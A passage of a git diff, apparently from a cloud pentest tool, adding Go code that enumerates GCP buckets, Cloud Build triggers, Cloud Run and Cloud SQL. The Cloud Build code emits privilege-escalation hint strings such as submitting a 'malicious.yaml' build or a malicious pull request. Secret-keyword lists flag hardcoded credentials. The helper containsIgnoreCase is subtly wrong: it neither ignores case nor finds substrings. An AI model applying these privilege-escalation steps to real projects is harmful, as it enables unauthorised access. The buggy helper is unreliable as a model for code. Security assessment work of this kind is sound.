storage.NewClient(ctx) + if err != nil { + return nil, false, fmt.Errorf("failed to create client: %v", err) + } + return client, true, nil +} + +// getClientOption returns the appropriate client option based on session +func (cs *CloudStorageService) getClientOption() option.ClientOption { + if cs.session != nil { + return cs.session.GetClientOption() + } + return nil +} + +// getBucketIAMPolicy retrieves the IAM policy for a bucket and checks for public access +func (cs *CloudStorageService) getBucketIAMPolicy(ctx context.Context, client *storage.Client, bucketName string) ([]IAMBinding, bool, string) { + var bindings []IAMBinding + isPublic := false + hasAllUsers := false + hasAllAuthenticatedUsers := false + + policy, err := client.Bucket(bucketName).IAM().Policy(ctx) + if err != nil { + // Return empty bindings if we can't get the policy (permission denied, etc.) + return bindings, false, "Unknown" + } + + // Convert IAM policy to our binding format + for _, role := range policy.Roles() { + members := policy.Members(role) + if len(members) > 0 { + binding := IAMBinding{ + Role: string(role), + Members: make([]string, len(members)), + } + for i, member := range members { + binding.Members[i] = member + + // Check for public access + if member == string(iam.AllUsers) { + hasAllUsers = true + isPublic = true + } + if member == string(iam.AllAuthenticatedUsers) { + hasAllAuthenticatedUsers = true + isPublic = true + } + } + bindings = append(bindings, binding) + } + } + + // Determine public access level + publicAccess := "None" + if hasAllUsers && hasAllAuthenticatedUsers { + publicAccess = "allUsers + allAuthenticatedUsers" + } else if hasAllUsers { + publicAccess = "allUsers" + } else if hasAllAuthenticatedUsers { + publicAccess = "allAuthenticatedUsers" + } + + return bindings, isPublic, publicAccess +} + +// GetBucketIAMPolicyOnly retrieves just the IAM policy for a specific bucket +func (cs *CloudStorageService) GetBucketIAMPolicyOnly(bucketName string) ([]IAMBinding, error) { + ctx := context.Background() + + client, closeClient, err := cs.getClient(ctx) + if err != nil { + return nil, err + } + if closeClient { + defer client.Close() + } + + bindings, _, _ := cs.getBucketIAMPolicy(ctx, client, bucketName) + return bindings, nil +} + +// publicAccessPreventionToString converts the PublicAccessPrevention type to a readable string +func publicAccessPreventionToString(pap storage.PublicAccessPrevention) string { + switch pap { + case storage.PublicAccessPreventionEnforced: + return "enforced" + case storage.PublicAccessPreventionInherited: + return "inherited" + default: + return "unspecified" + } +} + +// FormatIAMBindings formats IAM bindings for display +func FormatIAMBindings(bindings []IAMBinding) string { + if len(bindings) == 0 { + return "No IAM bindings" + } + + var parts []string + for _, binding := range bindings { + memberStr := strings.Join(binding.Members, ", ") + parts = append(parts, fmt.Sprintf("%s: [%s]", binding.Role, memberStr)) + } + return strings.Join(parts, "; ") +} + +// FormatIAMBindingsShort formats IAM bindings in a shorter format for table display +func FormatIAMBindingsShort(bindings []IAMBinding) string { + if len(bindings) == 0 { + return "-" + } + return fmt.Sprintf("%d binding(s)", len(bindings)) +} + +// enrichBucketFromRestAPI fetches additional bucket fields via the REST API +// that may not be available in the Go SDK version +func (cs *CloudStorageService) enrichBucketFromRestAPI(ctx context.Context, bucket *BucketInfo) { + var service *storageapi.Service + var err error + + // Use session if available + if cs.session != nil { + service, err = storageapi.NewService(ctx, cs.session.GetClientOption()) + } else { + service, err = storageapi.NewService(ctx) + } + + if err != nil { + // Silently fail - these are optional enrichments + return + } + + // Get bucket details via REST API + restBucket, err := service.Buckets.Get(bucket.Name).Context(ctx).Do() + if err != nil { + // Silently fail - these are optional enrichments + return + } + + // Parse SoftDeletePolicy + if restBucket.SoftDeletePolicy != nil { + if restBucket.SoftDeletePolicy.RetentionDurationSeconds > 0 { + bucket.SoftDeleteEnabled = true + bucket.SoftDeleteRetentionDays = restBucket.SoftDeletePolicy.RetentionDurationSeconds / 86400 // seconds to days + } + } + + // Parse Updated timestamp + if restBucket.Updated != "" { + // REST API returns RFC3339 format + if t, err := time.Parse(time.RFC3339, restBucket.Updated); err == nil { + bucket.Updated = t.Format("2006-01-02") + } + } + + // Parse location type + bucket.LocationType = restBucket.LocationType + + // Parse Turbo Replication (for dual-region buckets) + if restBucket.Rpo == "ASYNC_TURBO" { + bucket.TurboReplication = true + } + + // Parse Lifecycle rules + if restBucket.Lifecycle != nil && len(restBucket.Lifecycle.Rule) > 0 { + bucket.LifecycleEnabled = true + bucket.LifecycleRuleCount = len(restBucket.Lifecycle.Rule) + bucket.ShortestDeleteDays = -1 // Initialize to -1 to indicate not set + + for _, rule := range restBucket.Lifecycle.Rule { + lcRule := LifecycleRule{} + + // Parse action + if rule.Action != nil { + lcRule.Action = rule.Action.Type + lcRule.StorageClass = rule.Action.StorageClass + + if rule.Action.Type == "Delete" { + bucket.HasDeleteRule = true + } else if rule.Action.Type == "SetStorageClass" { + bucket.HasArchiveRule = true + } + } + + // Parse conditions + if rule.Condition != nil { + // Age is a pointer to int64 + if rule.Condition.Age != nil && *rule.Condition.Age > 0 { + lcRule.AgeDays = *rule.Condition.Age + // Track shortest delete age + if lcRule.Action == "Delete" && (bucket.ShortestDeleteDays == -1 || *rule.Condition.Age < bucket.ShortestDeleteDays) { + bucket.ShortestDeleteDays = *rule.Condition.Age + } + } + if rule.Condition.NumNewerVersions > 0 { + lcRule.NumVersions = rule.Condition.NumNewerVersions + } + if rule.Condition.IsLive != nil { + lcRule.IsLive = rule.Condition.IsLive + } + if len(rule.Condition.MatchesPrefix) > 0 { + lcRule.MatchesPrefix = strings.Join(rule.Condition.MatchesPrefix, ",") + } + if len(rule.Condition.MatchesSuffix) > 0 { + lcRule.MatchesSuffix = strings.Join(rule.Condition.MatchesSuffix, ",") + } + if len(rule.Condition.MatchesStorageClass) > 0 { + lcRule.MatchesStorage = strings.Join(rule.Condition.MatchesStorageClass, ",") + } + if rule.Condition.CreatedBefore != "" { + lcRule.CreatedBefore = rule.Condition.CreatedBefore + } + if rule.Condition.DaysSinceCustomTime > 0 { + lcRule.DaysSinceCustom = rule.Condition.DaysSinceCustomTime + } + if rule.Condition.DaysSinceNoncurrentTime > 0 { + lcRule.DaysSinceNoncurrent = rule.Condition.DaysSinceNoncurrentTime + } + } + + bucket.LifecycleRules = append(bucket.LifecycleRules, lcRule) + } + + // If no delete rule, reset to 0 + if bucket.ShortestDeleteDays == -1 { + bucket.ShortestDeleteDays = 0 + } + } +} diff --git a/gcp/services/cloudbuildService/cloudbuildService.go b/gcp/services/cloudbuildService/cloudbuildService.go new file mode 100644 index 00000000..784357b0 --- /dev/null +++ b/gcp/services/cloudbuildService/cloudbuildService.go @@ -0,0 +1,361 @@ +package cloudbuildservice + +import ( + "context" + "fmt" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + cloudbuild "google.golang.org/api/cloudbuild/v1" +) + +type CloudBuildService struct { + session *gcpinternal.SafeSession +} + +// New creates a new CloudBuildService +func New() *CloudBuildService { + return &CloudBuildService{} +} + +// NewWithSession creates a CloudBuildService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *CloudBuildService { + return &CloudBuildService{session: session} +} + +// TriggerInfo represents a Cloud Build trigger +type TriggerInfo struct { + ID string `json:"id"` + Name string `json:"name"` + Description string `json:"description"` + ProjectID string `json:"projectId"` + Disabled bool `json:"disabled"` + CreateTime string `json:"createTime"` + + // Source configuration + SourceType string `json:"sourceType"` // github, cloud_source_repos, etc. + RepoName string `json:"repoName"` + BranchName string `json:"branchName"` + TagName string `json:"tagName"` + + // Build configuration + BuildConfigType string `json:"buildConfigType"` // yaml, dockerfile, inline + Filename string `json:"filename"` // cloudbuild.yaml path + ServiceAccount string `json:"serviceAccount"` // SA used for builds + Substitutions map[string]string `json:"substitutions"` + + // Security analysis + IsPublicRepo bool `json:"isPublicRepo"` + HasSecrets bool `json:"hasSecrets"` + PrivescPotential bool `json:"privescPotential"` +} + +// BuildInfo represents a Cloud Build execution +type BuildInfo struct { + ID string `json:"id"` + ProjectID string `json:"projectId"` + Status string `json:"status"` + CreateTime string `json:"createTime"` + StartTime string `json:"startTime"` + FinishTime string `json:"finishTime"` + TriggerID string `json:"triggerId"` + Source string `json:"source"` + ServiceAccount string `json:"serviceAccount"` + LogsBucket string `json:"logsBucket"` + Images []string `json:"images"` + // Pentest-specific fields + BuildSteps []BuildStep `json:"buildSteps"` + SecretEnvVars []string `json:"secretEnvVars"` + Artifacts []string `json:"artifacts"` +} + +// BuildStep represents a single step in a Cloud Build +type BuildStep struct { + Name string `json:"name"` // Container image + Args []string `json:"args"` // Command arguments + Entrypoint string `json:"entrypoint"` // Custom entrypoint + Env []string `json:"env"` // Environment variables + SecretEnv []string `json:"secretEnv"` // Secret environment variables + Volumes []string `json:"volumes"` // Mounted volumes +} + +// TriggerSecurityAnalysis contains detailed security analysis +type TriggerSecurityAnalysis struct { + TriggerName string `json:"triggerName"` + ProjectID string `json:"projectId"` + ServiceAccount string `json:"serviceAccount"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` + ExploitCommands []string `json:"exploitCommands"` + PrivescPotential bool `json:"privescPotential"` +} + +// ListTriggers retrieves all Cloud Build triggers in a project +func (s *CloudBuildService) ListTriggers(projectID string) ([]TriggerInfo, error) { + ctx := context.Background() + var service *cloudbuild.Service + var err error + + if s.session != nil { + service, err = cloudbuild.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = cloudbuild.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudbuild.googleapis.com") + } + + var triggers []TriggerInfo + parent := fmt.Sprintf("projects/%s/locations/global", projectID) + + req := service.Projects.Locations.Triggers.List(parent) + err = req.Pages(ctx, func(page *cloudbuild.ListBuildTriggersResponse) error { + for _, trigger := range page.Triggers { + info := s.parseTrigger(trigger, projectID) + triggers = append(triggers, info) + } + return nil + }) + if err != nil { + // Try with just project ID (older API) + req2 := service.Projects.Triggers.List(projectID) + err2 := req2.Pages(ctx, func(page *cloudbuild.ListBuildTriggersResponse) error { + for _, trigger := range page.Triggers { + info := s.parseTrigger(trigger, projectID) + triggers = append(triggers, info) + } + return nil + }) + if err2 != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudbuild.googleapis.com") + } + } + + return triggers, nil +} + +// ListBuilds retrieves recent Cloud Build executions +func (s *CloudBuildService) ListBuilds(projectID string, limit int64) ([]BuildInfo, error) { + ctx := context.Background() + var service *cloudbuild.Service + var err error + + if s.session != nil { + service, err = cloudbuild.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = cloudbuild.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudbuild.googleapis.com") + } + + var builds []BuildInfo + parent := fmt.Sprintf("projects/%s/locations/global", projectID) + + req := service.Projects.Locations.Builds.List(parent).PageSize(limit) + resp, err := req.Do() + if err != nil { + // Try with just project ID + req2 := service.Projects.Builds.List(projectID).PageSize(limit) + resp, err = req2.Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudbuild.googleapis.com") + } + } + + for _, build := range resp.Builds { + info := BuildInfo{ + ID: build.Id, + ProjectID: projectID, + Status: build.Status, + CreateTime: build.CreateTime, + StartTime: build.StartTime, + FinishTime: build.FinishTime, + ServiceAccount: build.ServiceAccount, + LogsBucket: build.LogsBucket, + Images: build.Images, + } + if build.BuildTriggerId != "" { + info.TriggerID = build.BuildTriggerId + } + if build.Source != nil && build.Source.RepoSource != nil { + info.Source = build.Source.RepoSource.RepoName + } + + // Parse build steps for pentest analysis + for _, step := range build.Steps { + if step == nil { + continue + } + bs := BuildStep{ + Name: step.Name, + Args: step.Args, + Entrypoint: step.Entrypoint, + Env: step.Env, + SecretEnv: step.SecretEnv, + } + for _, vol := range step.Volumes { + if vol != nil { + bs.Volumes = append(bs.Volumes, vol.Name+":"+vol.Path) + } + } + info.BuildSteps = append(info.BuildSteps, bs) + info.SecretEnvVars = append(info.SecretEnvVars, step.SecretEnv...) + } + + // Parse artifacts + if build.Artifacts != nil { + info.Artifacts = build.Artifacts.Images + } + + builds = append(builds, info) + } + + return builds, nil +} + +// AnalyzeTriggerForPrivesc performs detailed privesc analysis on a trigger +func (s *CloudBuildService) AnalyzeTriggerForPrivesc(trigger TriggerInfo, projectID string) TriggerSecurityAnalysis { + analysis := TriggerSecurityAnalysis{ + TriggerName: trigger.Name, + ProjectID: projectID, + ServiceAccount: trigger.ServiceAccount, + RiskReasons: []string{}, + } + + score := 0 + + // Check service account privileges + if trigger.ServiceAccount == "" { + analysis.RiskReasons = append(analysis.RiskReasons, + "Uses default Cloud Build SA (often has broad permissions)") + analysis.ExploitCommands = append(analysis.ExploitCommands, + fmt.Sprintf("# Default SA often has: storage.admin, source.admin, artifactregistry.admin\n"+ + "gcloud builds submit --config=malicious.yaml --project=%s", projectID)) + score += 2 + analysis.PrivescPotential = true + } else { + analysis.ExploitCommands = append(analysis.ExploitCommands, + fmt.Sprintf("# Build runs as: %s\n"+ + "# Check SA permissions:\n"+ + "gcloud projects get-iam-policy %s --flatten='bindings[].members' --filter='bindings.members:%s'", + trigger.ServiceAccount, projectID, trigger.ServiceAccount)) + } + + // GitHub PR triggers are exploitable + if trigger.SourceType == "github" && trigger.BranchName != "" { + analysis.RiskReasons = append(analysis.RiskReasons, + "GitHub trigger may execute code from pull requests") + analysis.ExploitCommands = append(analysis.ExploitCommands, + "# Fork repo, submit PR with malicious cloudbuild.yaml to trigger build") + score += 2 + } + + // Inline build configs might leak secrets + if trigger.BuildConfigType == "inline" { + analysis.RiskReasons = append(analysis.RiskReasons, + "Inline build config may contain hardcoded secrets or commands") + score += 1 + } + + // Secrets in substitutions + if trigger.HasSecrets { + analysis.RiskReasons = append(analysis.RiskReasons, + "Trigger uses substitution variables that may contain secrets") + score += 1 + } + + // Add exploitation guidance + analysis.ExploitCommands = append(analysis.ExploitCommands, + fmt.Sprintf("# Trigger a build manually:\n"+ + "gcloud builds triggers run %s --project=%s --branch=%s", + trigger.ID, projectID, trigger.BranchName)) + + if score >= 3 { + analysis.RiskLevel = "HIGH" + } else if score >= 2 { + analysis.RiskLevel = "MEDIUM" + } else { + analysis.RiskLevel = "LOW" + } + + return analysis +} + +// parseTrigger converts a trigger to TriggerInfo +func (s *CloudBuildService) parseTrigger(trigger *cloudbuild.BuildTrigger, projectID string) TriggerInfo { + info := TriggerInfo{ + ID: trigger.Id, + Name: trigger.Name, + Description: trigger.Description, + ProjectID: projectID, + Disabled: trigger.Disabled, + CreateTime: trigger.CreateTime, + Substitutions: trigger.Substitutions, + } + + // Parse source configuration + if trigger.Github != nil { + info.SourceType = "github" + info.RepoName = fmt.Sprintf("%s/%s", trigger.Github.Owner, trigger.Github.Name) + if trigger.Github.Push != nil { + info.BranchName = trigger.Github.Push.Branch + info.TagName = trigger.Github.Push.Tag + } + if trigger.Github.PullRequest != nil { + info.BranchName = trigger.Github.PullRequest.Branch + } + } else if trigger.TriggerTemplate != nil { + info.SourceType = "cloud_source_repos" + info.RepoName = trigger.TriggerTemplate.RepoName + info.BranchName = trigger.TriggerTemplate.BranchName + info.TagName = trigger.TriggerTemplate.TagName + } + + // Parse build configuration + if trigger.Filename != "" { + info.BuildConfigType = "yaml" + info.Filename = trigger.Filename + } else if trigger.Build != nil { + info.BuildConfigType = "inline" + } + + // Service account + if trigger.ServiceAccount != "" { + info.ServiceAccount = trigger.ServiceAccount + } + + // Check for secrets in substitutions + for key := range trigger.Substitutions { + if containsSecretKeyword(key) { + info.HasSecrets = true + break + } + } + + // Determine privesc potential + // Default SA is often over-privileged, GitHub triggers can execute untrusted code + if info.ServiceAccount == "" { + info.PrivescPotential = true + } + if info.SourceType == "github" && info.BranchName != "" { + info.PrivescPotential = true + } + + return info +} + +// containsSecretKeyword checks if a key might contain secrets +func containsSecretKeyword(key string) bool { + secretKeywords := []string{"SECRET", "PASSWORD", "TOKEN", "KEY", "CREDENTIAL", "AUTH"} + for _, keyword := range secretKeywords { + if containsIgnoreCase(key, keyword) { + return true + } + } + return false +} + +func containsIgnoreCase(s, substr string) bool { + return len(s) >= len(substr) && (s == substr || + len(s) > len(substr) && (s[:len(substr)] == substr || s[len(s)-len(substr):] == substr)) +} diff --git a/gcp/services/cloudrunService/cloudrunService.go b/gcp/services/cloudrunService/cloudrunService.go new file mode 100644 index 00000000..068e9cef --- /dev/null +++ b/gcp/services/cloudrunService/cloudrunService.go @@ -0,0 +1,549 @@ +package cloudrunservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + run "google.golang.org/api/run/v2" +) + +type CloudRunService struct{} + +func New() *CloudRunService { + return &CloudRunService{} +} + +// ServiceInfo holds Cloud Run service details with security-relevant information +type ServiceInfo struct { + // Basic info + Name string + ProjectID string + Region string + Description string + Creator string + UpdateTime string + + // URL and traffic + URL string + LatestRevision string + LatestReadyRevision string + TrafficAllOnLatest bool + + // Security-relevant configuration + ServiceAccount string + IngressSettings string // INGRESS_TRAFFIC_ALL, INGRESS_TRAFFIC_INTERNAL_ONLY, INGRESS_TRAFFIC_INTERNAL_LOAD_BALANCER + VPCAccess string // VPC Connector or Direct VPC + VPCEgressSettings string // ALL_TRAFFIC, PRIVATE_RANGES_ONLY + BinaryAuthorizationPolicy string + + // Container configuration + ContainerImage string + ContainerPort int64 + CPULimit string + MemoryLimit string + MaxInstances int64 + MinInstances int64 + Timeout string + + // Environment variables (counts, not values) + EnvVarCount int + SecretEnvVarCount int + SecretVolumeCount int + + // Security analysis + HardcodedSecrets []HardcodedSecret // Potential secrets in env vars (not using Secret Manager) + UsesDefaultSA bool // Uses default compute service account + + // Detailed env var and secret info + EnvVars []EnvVarInfo // All environment variables + SecretRefs []SecretRefInfo // All Secret Manager references + + // IAM + InvokerMembers []string + IsPublic bool +} + +// HardcodedSecret represents a potential secret found in environment variables +type HardcodedSecret struct { + EnvVarName string + SecretType string // password, api-key, token, credential, connection-string +} + +// EnvVarInfo represents an environment variable configuration +type EnvVarInfo struct { + Name string + Value string // Direct value (may be empty if using secret ref) + Source string // "direct", "secret-manager", or "config-map" + // For Secret Manager references + SecretName string + SecretVersion string +} + +// SecretRefInfo represents a Secret Manager reference used by the service +type SecretRefInfo struct { + EnvVarName string // The env var name that references this secret + SecretName string // Secret Manager secret name + SecretVersion string // Version (e.g., "latest", "1") + MountPath string // For volume mounts, the path where it's mounted + Type string // "env" or "volume" +} + +// JobInfo holds Cloud Run job details +type JobInfo struct { + Name string + ProjectID string + Region string + ServiceAccount string + ContainerImage string + LastExecution string + Creator string + UpdateTime string + + // Configuration + TaskCount int64 + Parallelism int64 + MaxRetries int64 + Timeout string + + // Environment + EnvVarCount int + SecretEnvVarCount int + SecretVolumeCount int + + // Security analysis + HardcodedSecrets []HardcodedSecret + UsesDefaultSA bool + + // Detailed env var and secret info + EnvVars []EnvVarInfo + SecretRefs []SecretRefInfo +} + +// Services retrieves all Cloud Run services in a project across all regions +func (cs *CloudRunService) Services(projectID string) ([]ServiceInfo, error) { + ctx := context.Background() + + service, err := run.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "run.googleapis.com") + } + + var services []ServiceInfo + + // List services across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + + call := service.Projects.Locations.Services.List(parent) + err = call.Pages(ctx, func(page *run.GoogleCloudRunV2ListServicesResponse) error { + for _, svc := range page.Services { + info := parseServiceInfo(svc, projectID) + + // Try to get IAM policy + iamPolicy, iamErr := cs.getServiceIAMPolicy(service, svc.Name) + if iamErr == nil && iamPolicy != nil { + info.InvokerMembers, info.IsPublic = parseInvokerBindings(iamPolicy) + } + + services = append(services, info) + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "run.googleapis.com") + } + + return services, nil +} + +// Jobs retrieves all Cloud Run jobs in a project across all regions +func (cs *CloudRunService) Jobs(projectID string) ([]JobInfo, error) { + ctx := context.Background() + + service, err := run.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "run.googleapis.com") + } + + var jobs []JobInfo + + // List jobs across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + + call := service.Projects.Locations.Jobs.List(parent) + err = call.Pages(ctx, func(page *run.GoogleCloudRunV2ListJobsResponse) error { + for _, job := range page.Jobs { + info := parseJobInfo(job, projectID) + jobs = append(jobs, info) + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "run.googleapis.com") + } + + return jobs, nil +} + +// parseServiceInfo extracts relevant information from a Cloud Run service +func parseServiceInfo(svc *run.GoogleCloudRunV2Service, projectID string) ServiceInfo { + info := ServiceInfo{ + Name: extractName(svc.Name), + ProjectID: projectID, + Description: svc.Description, + Creator: svc.Creator, + UpdateTime: svc.UpdateTime, + URL: svc.Uri, + } + + // Extract region from service name + // Format: projects/{project}/locations/{location}/services/{name} + parts := strings.Split(svc.Name, "/") + if len(parts) >= 4 { + info.Region = parts[3] + } + + // Ingress settings + info.IngressSettings = svc.Ingress + + // Latest revision info + info.LatestRevision = svc.LatestCreatedRevision + info.LatestReadyRevision = svc.LatestReadyRevision + + // Check if all traffic goes to latest + for _, traffic := range svc.Traffic { + if traffic.Type == "TRAFFIC_TARGET_ALLOCATION_TYPE_LATEST" && traffic.Percent == 100 { + info.TrafficAllOnLatest = true + break + } + } + + // Binary authorization + if svc.BinaryAuthorization != nil { + info.BinaryAuthorizationPolicy = svc.BinaryAuthorization.Policy + if svc.BinaryAuthorization.UseDefault { + info.BinaryAuthorizationPolicy = "default" + } + } + + // Template configuration (current revision settings) + if svc.Template != nil { + info.ServiceAccount = svc.Template.ServiceAccount + info.Timeout = svc.Template.Timeout + + if svc.Template.Scaling != nil { + info.MaxInstances = svc.Template.Scaling.MaxInstanceCount + info.MinInstances = svc.Template.Scaling.MinInstanceCount + } + + // VPC access configuration + if svc.Template.VpcAccess != nil { + info.VPCAccess = svc.Template.VpcAccess.Connector + info.VPCEgressSettings = svc.Template.VpcAccess.Egress + if info.VPCAccess == "" && svc.Template.VpcAccess.NetworkInterfaces != nil { + info.VPCAccess = "Direct VPC" + } + } + + // Container configuration + if len(svc.Template.Containers) > 0 { + container := svc.Template.Containers[0] + info.ContainerImage = container.Image + + // Port + if len(container.Ports) > 0 { + info.ContainerPort = container.Ports[0].ContainerPort + } + + // Resources + if container.Resources != nil { + if container.Resources.Limits != nil { + if cpu, ok := container.Resources.Limits["cpu"]; ok { + info.CPULimit = cpu + } + if mem, ok := container.Resources.Limits["memory"]; ok { + info.MemoryLimit = mem + } + } + } + + // Environment variables + info.EnvVarCount = len(container.Env) + + // Process each environment variable + for _, env := range container.Env { + envInfo := EnvVarInfo{ + Name: env.Name, + } + + if env.ValueSource != nil && env.ValueSource.SecretKeyRef != nil { + // Secret Manager reference + info.SecretEnvVarCount++ + envInfo.Source = "secret-manager" + envInfo.SecretName = env.ValueSource.SecretKeyRef.Secret + envInfo.SecretVersion = env.ValueSource.SecretKeyRef.Version + + // Also add to SecretRefs + info.SecretRefs = append(info.SecretRefs, SecretRefInfo{ + EnvVarName: env.Name, + SecretName: env.ValueSource.SecretKeyRef.Secret, + SecretVersion: env.ValueSource.SecretKeyRef.Version, + Type: "env", + }) + } else { + // Direct value + envInfo.Source = "direct" + envInfo.Value = env.Value + } + + info.EnvVars = append(info.EnvVars, envInfo) + } + + // Count secret volumes + for _, vol := range container.VolumeMounts { + // Check if this volume is a secret + for _, svcVol := range svc.Template.Volumes { + if svcVol.Name == vol.Name && svcVol.Secret != nil { + info.SecretVolumeCount++ + info.SecretRefs = append(info.SecretRefs, SecretRefInfo{ + SecretName: svcVol.Secret.Secret, + SecretVersion: "latest", + MountPath: vol.MountPath, + Type: "volume", + }) + break + } + } + } + + // Detect hardcoded secrets in env vars + info.HardcodedSecrets = detectHardcodedSecrets(container.Env) + } + + // Check for default service account + info.UsesDefaultSA = isDefaultServiceAccount(info.ServiceAccount, projectID) + } + + return info +} + +// parseJobInfo extracts relevant information from a Cloud Run job +func parseJobInfo(job *run.GoogleCloudRunV2Job, projectID string) JobInfo { + info := JobInfo{ + Name: extractName(job.Name), + ProjectID: projectID, + Creator: job.Creator, + UpdateTime: job.UpdateTime, + } + + // Extract region from job name + parts := strings.Split(job.Name, "/") + if len(parts) >= 4 { + info.Region = parts[3] + } + + // Last execution + if job.LatestCreatedExecution != nil { + info.LastExecution = job.LatestCreatedExecution.Name + } + + // Template configuration + if job.Template != nil { + info.TaskCount = job.Template.TaskCount + info.Parallelism = job.Template.Parallelism + + if job.Template.Template != nil { + info.MaxRetries = job.Template.Template.MaxRetries + info.Timeout = job.Template.Template.Timeout + info.ServiceAccount = job.Template.Template.ServiceAccount + + // Container configuration + if len(job.Template.Template.Containers) > 0 { + container := job.Template.Template.Containers[0] + info.ContainerImage = container.Image + + // Environment variables + info.EnvVarCount = len(container.Env) + + // Process each environment variable + for _, env := range container.Env { + envInfo := EnvVarInfo{ + Name: env.Name, + } + + if env.ValueSource != nil && env.ValueSource.SecretKeyRef != nil { + // Secret Manager reference + info.SecretEnvVarCount++ + envInfo.Source = "secret-manager" + envInfo.SecretName = env.ValueSource.SecretKeyRef.Secret + envInfo.SecretVersion = env.ValueSource.SecretKeyRef.Version + + // Also add to SecretRefs + info.SecretRefs = append(info.SecretRefs, SecretRefInfo{ + EnvVarName: env.Name, + SecretName: env.ValueSource.SecretKeyRef.Secret, + SecretVersion: env.ValueSource.SecretKeyRef.Version, + Type: "env", + }) + } else { + // Direct value + envInfo.Source = "direct" + envInfo.Value = env.Value + } + + info.EnvVars = append(info.EnvVars, envInfo) + } + + // Count secret volumes + for _, vol := range container.VolumeMounts { + for _, jobVol := range job.Template.Template.Volumes { + if jobVol.Name == vol.Name && jobVol.Secret != nil { + info.SecretVolumeCount++ + info.SecretRefs = append(info.SecretRefs, SecretRefInfo{ + SecretName: jobVol.Secret.Secret, + SecretVersion: "latest", + MountPath: vol.MountPath, + Type: "volume", + }) + break + } + } + } + + // Detect hardcoded secrets in env vars + info.HardcodedSecrets = detectHardcodedSecrets(container.Env) + } + + // Check for default service account + info.UsesDefaultSA = isDefaultServiceAccount(info.ServiceAccount, projectID) + } + } + + return info +} + +// getServiceIAMPolicy retrieves the IAM policy for a Cloud Run service +func (cs *CloudRunService) getServiceIAMPolicy(service *run.Service, serviceName string) (*run.GoogleIamV1Policy, error) { + ctx := context.Background() + + policy, err := service.Projects.Locations.Services.GetIamPolicy(serviceName).Context(ctx).Do() + if err != nil { + return nil, err + } + + return policy, nil +} + +// parseInvokerBindings extracts who can invoke the service and checks for public access +func parseInvokerBindings(policy *run.GoogleIamV1Policy) ([]string, bool) { + var invokers []string + isPublic := false + + for _, binding := range policy.Bindings { + // Check for invoker role + if binding.Role == "roles/run.invoker" { + invokers = append(invokers, binding.Members...) + + // Check for public access + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + isPublic = true + } + } + } + } + + return invokers, isPublic +} + +// extractName extracts just the resource name from the full resource name +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +// secretPatterns maps env var name patterns to secret types +var secretPatterns = map[string]string{ + "PASSWORD": "password", + "PASSWD": "password", + "SECRET": "secret", + "API_KEY": "api-key", + "APIKEY": "api-key", + "API-KEY": "api-key", + "TOKEN": "token", + "ACCESS_TOKEN": "token", + "AUTH_TOKEN": "token", + "BEARER": "token", + "CREDENTIAL": "credential", + "PRIVATE_KEY": "credential", + "PRIVATEKEY": "credential", + "CONNECTION_STRING": "connection-string", + "CONN_STR": "connection-string", + "DATABASE_URL": "connection-string", + "DB_PASSWORD": "password", + "DB_PASS": "password", + "MYSQL_PASSWORD": "password", + "POSTGRES_PASSWORD": "password", + "REDIS_PASSWORD": "password", + "MONGODB_URI": "connection-string", + "AWS_ACCESS_KEY": "credential", + "AWS_SECRET": "credential", + "AZURE_KEY": "credential", + "GCP_KEY": "credential", + "ENCRYPTION_KEY": "credential", + "SIGNING_KEY": "credential", + "JWT_SECRET": "credential", + "SESSION_SECRET": "credential", + "OAUTH": "credential", + "CLIENT_SECRET": "credential", +} + +// detectHardcodedSecrets analyzes env vars to find potential hardcoded secrets +func detectHardcodedSecrets(envVars []*run.GoogleCloudRunV2EnvVar) []HardcodedSecret { + var secrets []HardcodedSecret + + for _, env := range envVars { + if env == nil { + continue + } + + // Skip if using Secret Manager reference + if env.ValueSource != nil && env.ValueSource.SecretKeyRef != nil { + continue + } + + // Only flag if there's a direct value (not empty) + if env.Value == "" { + continue + } + + envNameUpper := strings.ToUpper(env.Name) + + for pattern, secretType := range secretPatterns { + if strings.Contains(envNameUpper, pattern) { + secrets = append(secrets, HardcodedSecret{ + EnvVarName: env.Name, + SecretType: secretType, + }) + break + } + } + } + + return secrets +} + +// isDefaultServiceAccount checks if the service account is a default compute SA +func isDefaultServiceAccount(sa, projectID string) bool { + if sa == "" { + return true // Empty means using default + } + // Default compute SA pattern: {project-number}-compute@developer.gserviceaccount.com + return strings.Contains(sa, "-compute@developer.gserviceaccount.com") +} diff --git a/gcp/services/cloudsqlService/cloudsqlService.go b/gcp/services/cloudsqlService/cloudsqlService.go new file mode 100644 index 00000000..ea6b6cdc --- /dev/null +++ b/gcp/services/cloudsqlService/cloudsqlService.go @@ -0,0 +1,268 @@ +package cloudsqlservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + sqladmin "google.golang.org/api/sqladmin/v1" +) + +type CloudSQLService struct{} + +func New() *CloudSQLService { + return &CloudSQLService{} +} + +// SQLInstanceInfo holds Cloud SQL instance details with security-relevant information +type SQLInstanceInfo struct { + // Basic info + Name string + ProjectID string + Region string + DatabaseVersion string + Tier string + State string + + // Network configuration + PublicIP string + PrivateIP string + HasPublicIP bool + AuthorizedNetworks []AuthorizedNetwork + RequireSSL bool + SSLMode string + + // Security configuration + ServiceAccountEmail string + RootPasswordSet bool + PasswordPolicyEnabled bool + IAMAuthentication bool + + // Backup configuration + BackupEnabled bool + 